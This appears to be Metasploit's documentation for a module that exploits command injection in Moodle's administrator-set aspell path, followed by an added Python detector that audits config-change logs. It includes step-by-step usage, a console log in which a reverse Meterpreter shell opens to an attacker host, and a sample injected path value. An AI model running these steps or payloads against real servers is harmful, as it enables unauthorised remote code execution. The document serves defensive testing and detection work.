metasploit-gs/documentation/modules/exploit/multi/http/moodle_spellcheck_cmd_exec.md
2021-08-28 08:10:28 -04:00

## Vulnerable Application

Moodle lets an authenticated administrator define spellcheck settings through the web interface. An administrator can set the aspell path to a value that includes a command injection, which is then executed when the spellchecker runs. This is extremely similar to CVE-2013-3630, just using a different variable.

This module was tested against Moodle versions 3.10.0 and 3.8.0.

## Install

Moodle provides a step-by-step guide to installing their software here

## Verification Steps

  1. Install the application
  2. Start `msfconsole`
  3. Do: `use exploits/multi/http/moodle_spellcheck_cmd_exec`
  4. Do: `set username [username]`
  5. Do: `set password [password]`
  6. Do: `run`
  7. You should get a shell.

## Options

**Password**

Password of an administrator.

**Username**

Username of an administrator. Defaults to `admin`.

## Scenarios

### Moodle 3.10.0 on Ubuntu 20.04

```
resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spellcheck_cmd_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Moodle instance found, version unknown
[*] Authenticating as user: admin with login token Em5QrqGXT96iLHXKaTDoIwArMueav9Hq
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56014) at 2021-08-27 17:49:36 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin with login token mPj0QEp8KtPDgm8K9PNUauMu7wdwnSFY
[*] Removing RCE from settings

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > exit
```
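Because the module reverts the aspell path during cleanup ("Removing RCE from settings" above), a point-in-time look at the current settings will miss the attack; the admin config change history still records both the injected value and the revert. The following is an added detection example, not part of the module or of Moodle: it audits constructed rows shaped like Moodle's config change log (the `name`, `oldvalue`, `value`, `userid` and `timemodified` columns are an assumption about the schema, as are the `aspellpath` and `spellengine` setting names) and flags both the injection and its later cleanup.

```python
# Shell metacharacters and whitespace that never belong in a path to the aspell binary.
_META = frozenset(';&|`$<>(){}[]\\\'"\n\r\t ')


def is_safe_aspell_path(value: str) -> bool:
    """Accept only the empty default or an absolute path with no metacharacters."""
    if value == "":
        return True
    return value.startswith("/") and not any(c in _META for c in value)


def audit_config_log(rows):
    """Return findings for spellcheck-related changes.

    Both a suspicious new value and a suspicious old value are reported, so a
    revert to a clean path (the module's cleanup step) still surfaces the event.
    """
    findings = []
    for r in rows:
        ctx = {k: r[k] for k in ("userid", "timemodified", "oldvalue", "value")}
        if r["name"] == "aspellpath":
            bad_new = not is_safe_aspell_path(r["value"])
            bad_old = not is_safe_aspell_path(r["oldvalue"])
            if bad_new:
                findings.append({"severity": "high", "reason": "aspellpath set to injected value", **ctx})
            elif bad_old:
                findings.append({"severity": "high", "reason": "aspellpath reverted from injected value (possible cleanup)", **ctx})
        elif r["name"] == "spellengine" and r["value"] == "PSpellShell":
            # Legitimate setting, but it is the shell-backed engine the injection relies on.
            findings.append({"severity": "review", "reason": "spell engine switched to PSpellShell", **ctx})
    return findings


# Constructed sample rows (assumed column names; not real Moodle data).
SAMPLE_LOG = [
    {"name": "aspellpath", "oldvalue": "/usr/bin/aspell", "value": "/usr/bin/aspell; touch /tmp/marker",
     "userid": 2, "timemodified": 1630100000},
    {"name": "spellengine", "oldvalue": "", "value": "PSpellShell", "userid": 2, "timemodified": 1630100001},
    {"name": "aspellpath", "oldvalue": "/usr/bin/aspell; touch /tmp/marker", "value": "/usr/bin/aspell",
     "userid": 2, "timemodified": 1630100007},
    {"name": "forcelogin", "oldvalue": "0", "value": "1", "userid": 2, "timemodified": 1630100100},
]

if __name__ == "__main__":
    for f in audit_config_log(SAMPLE_LOG):
        print(f["severity"], f["timemodified"], f["reason"])
```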